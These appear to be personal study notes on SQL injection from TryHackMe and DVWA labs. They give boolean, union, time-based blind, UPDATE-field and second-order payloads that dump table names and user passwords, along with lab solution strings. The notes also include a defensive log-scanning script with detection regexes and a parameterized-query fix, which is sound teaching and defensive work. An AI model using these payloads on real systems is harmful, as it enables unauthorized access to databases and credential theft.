https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet


Boolean-based injection (compare one character of database() at a time):

?id=1' AND (ascii(substr((select database()),1,1))) = 115 --;


?id=1' AND (ascii(substr((select database()),2,1))) < 115 --+

Union-based SQL injection

resources: https://tryhackme.com/room/sqlibasics


Leveraging the UNION SQL operator.

UNION: combines the result sets of two or more SELECT statements into a single result.

things to determine :


https://stackoverflow.com/questions/3913620/get-all-table-names-of-a-particular-database-by-sql-query

  1. Table names, since the database name was already obtained with database().
' union SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA='sqlitraining' -- //

1 union select null, TABLE_NAME, null,null from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqlitraining'
webeight



  2. Column names for a given table; here the table of interest is 'users'.
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'tableName';

'UNION SELECT NULL,NULL,NULL,NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'users' -- //



'UNION SELECT NULL, fname, id, username,password from users -- //



DVWA

1' union SELECT NULL,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA='dvwa' #

' UNION SELECT NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'users' #

Blind SQL injection (time-based):

1' and IF(length(database())=3, SLEEP(5), "false")-- -

https://www.sisense.com/blog/sql-symbol-cheatsheet/


Brute force (bonus): finding the column count with NULL placeholders

1' UNION SELECT NULL, NULL,NULL,NULL,NULL, NULL, NULL, NULL # —

1' union SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' AND TABLE_SCHEMA='dvwa' #

' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = N'users' '

1 union SELECT null,table_name,null,null FROM information_schema.tables--
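The boolean, union, time-based and column-count payloads collected above all leave a recognisable shape in web server logs. The following is an added example, not part of the original notes: a small Python scanner that URL-decodes the request target of each access-log line and tags it with the technique whose pattern it matches. The log lines, the rule names (boolean_blind, union_enum, union_column_probe, time_blind, tautology) and the decision to decode twice are all my own constructions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). The payloads mirror the
# notes above; the last line is a benign request that should not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jan/2017:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [03/Jan/2017:10:00:02 +0000] "GET /item.php?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))%20=%20115%20--+ HTTP/1.1" 200 512
10.0.0.7 - - [03/Jan/2017:10:00:03 +0000] "GET /item.php?id=1%27%20union%20SELECT%20NULL,TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20%23 HTTP/1.1" 200 812
10.0.0.7 - - [03/Jan/2017:10:00:04 +0000] "GET /item.php?id=1%27+UNION+SELECT+NULL,+NULL,NULL,NULL+%23 HTTP/1.1" 500 0
10.0.0.7 - - [03/Jan/2017:10:00:09 +0000] "GET /item.php?id=1%27%20and%20IF(length(database())=3,%20SLEEP(5),%20%22false%22)--%20- HTTP/1.1" 200 512
10.0.0.9 - - [03/Jan/2017:10:00:10 +0000] "GET /login.php?profileID=1%27+or+%271%27%3D%271%27--+-&password=x HTTP/1.1" 302 0
10.0.0.9 - - [03/Jan/2017:10:00:11 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 300
"""

# One rule per technique from the notes. union_enum needs UNION, SELECT and a
# metadata table together, so an ordinary search for "union station" is not flagged.
RULES = {
    "boolean_blind": re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),
    "union_enum": re.compile(r"\bunion\b.*\bselect\b.*\b(?:information_schema|sqlite_master)\b", re.I),
    "union_column_probe": re.compile(r"\bunion\s+select\b(?:\s*null\s*,){2,}", re.I),
    "time_blind": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "tautology": re.compile(r"\bor\s+'?\d+'?\s*=\s*'?\d+", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def decode_target(line):
    """Return the URL-decoded request target of one log line, or None if unparsable."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Decode twice (a design choice here): once for the normal '+' and %xx case,
    # again so a double-encoded payload does not slip past the patterns.
    return unquote_plus(unquote_plus(m.group(1)))


def classify(line):
    """Names of the techniques whose pattern appears in the decoded request, in RULES order."""
    target = decode_target(line)
    if target is None:
        return []
    return [name for name, rx in RULES.items() if rx.search(target)]


def scan_log(text):
    """(client_ip, [technique, ...]) for every line that matches at least one rule."""
    findings = []
    for line in text.splitlines():
        hits = classify(line)
        if hits:
            findings.append((line.split(" ", 1)[0], hits))
    return findings


if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```

Run against the sample, five of the seven lines are flagged, each with exactly one technique, and the benign search request is left alone; in practice the rules are a starting point for a SIEM query or WAF review, not a complete signature set.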

SQL Injection

// PHP: both POST fields are concatenated straight into the query string
$query = "SELECT * FROM users WHERE username='" . $_POST["user"] . "' AND password='" . $_POST["password"] . "'";

The safest form of inline SQL comment is --<space><any character>, such as -- -: even when it is URL-encoded to --%20- it decodes back to -- -, whereas a bare trailing space after -- can be stripped in transit and the comment then fails. For more information, see: https://blog.raw.pm/en/sql-injection-mysql-comment/
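As an added example (not code from the original page or the lab), here is the concatenation pattern from the snippet above next to its parameterized form, run against a constructed in-memory SQLite table. The function names (make_db, build_vulnerable_query, login_vulnerable, login_parameterized) and the sample account are my own.

```python
import sqlite3


def make_db():
    """Constructed sample data (not the lab's database): one admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn


def build_vulnerable_query(user, password):
    # Same shape as the PHP snippet above: both inputs are spliced into the SQL text,
    # so a quote closes the literal and a trailing comment discards the password check.
    return ("SELECT * FROM users WHERE username='" + user
            + "' AND password='" + password + "'")


def login_vulnerable(conn, user, password):
    return conn.execute(build_vulnerable_query(user, password)).fetchall()


def login_parameterized(conn, user, password):
    # Placeholders: the values travel separately from the SQL text, so ' and -- are
    # plain data and the comparison is made against the whole string the user typed.
    return conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?", (user, password)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "1' or '1'='1'-- -"  # the string-input bypass from the lab notes
    print(build_vulnerable_query(payload, "x"))
    print("vulnerable:", login_vulnerable(conn, payload, "x"))        # admin row comes back
    print("parameterized:", login_parameterized(conn, payload, "x"))  # []
```

The parameterized version still authenticates a real admin/correct-horse pair; the only thing it loses is the ability of a quote or comment in the input to change the query's structure.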


TryHackMe | SQL Injection Lab

SQL Injection 1: Input box, non-string

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID=10 AND password = 'ce5ca67...'

SOLUTION: 1 or 1=1-- -


SQL Injection 2: Input box, string

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='10' AND password = 'ce5ca67...'
SOLUTION: 1' or '1'='1'-- -

SQL Injection 3: JavaScript sanitization

// Client-side check only: it runs in the browser, so it is not a server-side control.
function validateform() {
    var profileID = document.inputForm.profileID.value;
    var password = document.inputForm.password.value;

    // Allow-list: letters and digits only (rejects quotes, spaces, dashes and comment characters)
    if (/^[a-zA-Z0-9]*$/.test(profileID) == false || /^[a-zA-Z0-9]*$/.test(password) == false) {
        alert("The input fields cannot contain special characters");
        return false;
    }
    if (profileID == null || password == null) {
        alert("The input fields cannot be empty.");
        return false;
    }
}

SQL Injection 4 : Update

UPDATE <table_name> SET nickName='name', email='email' WHERE <condition>
# MySQL and MSSQL
',nickName=@@version,email='
# Oracle
',nickName=(SELECT banner FROM v$version),email='
# SQLite
',nickName=sqlite_version(),email='

A subquery fetches all the table names from the database and places them in the nickName field. The subquery is enclosed in parentheses; group_concat() joins all the table names into one value so they are returned at once.

',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='

The subquery again uses group_concat() to return all the rows in one value, and the || operator is "concatenate": it joins the strings of its operands (sqlite.org).

',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='
',nickName=(SELECT group_concat(profileID || "," || name || "," || password || ":") from usertable),email='

Union-based injection:

' UNION SELECT 1,group_concat(tbl_name) FROM sqlite_master-- -


' Union select 1, group_concat(sql) from sqlite_master where name='users'-- -


' union select 1, group_concat(password) from users-- -



Blind injection:

A guessing game: no data is returned directly, so the answer is inferred one character at a time from whether the condition is true or false.

SQLite:

SELECT password FROM users LIMIT 0,1    #THM{123123}
SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) #"T"
CAST(X'54' as Text)

# test the password length
admin' AND length((SELECT password from users where username='admin'))==37-- -

# brute-force guessing, one character at a time

admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)-- -

Vulnerable Notes

Parameterized queries vs. string concatenation

INSERT INTO notes (username, title, note) VALUES (?, ?, ?)
SELECT title, note FROM notes WHERE username = '" + username + "'

The INSERT uses placeholders (?), so whatever a user registers as a username is stored literally, quotes included. The SELECT concatenates that stored username straight into the query.

The password update likewise concatenates the username directly into the SQL query; only the password parameter gets a placeholder:

UPDATE users SET password = ? WHERE username = '" + username + "'
# register with the username:
admin' -- -
SELECT username, password FROM users WHERE id = ?
SELECT username, password FROM users WHERE id = 'admin' -- - '


Book title